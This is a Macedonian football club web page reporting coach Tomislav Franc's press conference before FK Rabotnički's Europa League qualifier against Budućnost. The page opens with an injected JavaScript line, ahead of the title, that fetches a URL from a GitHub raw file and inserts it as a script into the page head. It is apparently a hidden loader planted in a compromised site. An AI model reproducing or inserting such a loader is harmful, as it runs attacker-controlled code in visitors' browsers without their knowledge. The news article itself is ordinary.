;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Франц: Младоста треба да биде клучна да се одигра агресивно до победа
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Франц: Младоста треба да биде клучна да се одигра агресивно до победа

ФК Работнички денеска во прес-салата на националната арена „Филип Втори“ одржа конференција за медиумите во пресрет на утрешниот прв натпревар од 1. квалификациско коло за Лигата на Европа против црногорскиот Будуќност.

Шефот на стручниот штаб, Томислав Франц потенцира дека Работнички, за разлика од минатата година, сега игра со значително изменет состав, но верува дека младите играчи ќе покажат доволна агресивност и мотив преку кои ќе се стигне до посакуваната победа.

„Прва прес-конференција во Eвропа оваа сезона, a се надеваме не и последна. Сакаме долго европско лето. Тимот е подготвен за предизвикот кој го очекува. Имавме квалитетни подготовки во Словенија и верувам дека можеме да се пласираме во следната рунда натпревари“ – истакна Франц, притоа дополнувајќи:

„Составот е променет во однос на минатата сезона, седум-осум играчи од дуелите со Трабзонспор од минатата година не се веќе во Работнички. Сега имаме нов тим, се обидовме да се воиграме што е можно подобро и да одиграме квалитетно. Но, системот на работа е таков во Работнички, без секого се мора. Има промени, но имаме и нови играчи во кои силно веруваме. Младоста треба да биде клучна да одиграме агресивно, па со голема желба да се стигне до посакуваната победа“.

Натпреварот меѓу Работнички и Будуќност се игра утре од 18 часот на националната арена „Филип Втори“.

И „Варвари“ доаѓаат во Скопје

На трибините на националната арена „Филип Втори“ утре ќе бидат присутни и околу 200 гостински навивачи, членови на најверната навивачка група на Будуќност, „Варвари“.

Leave a Reply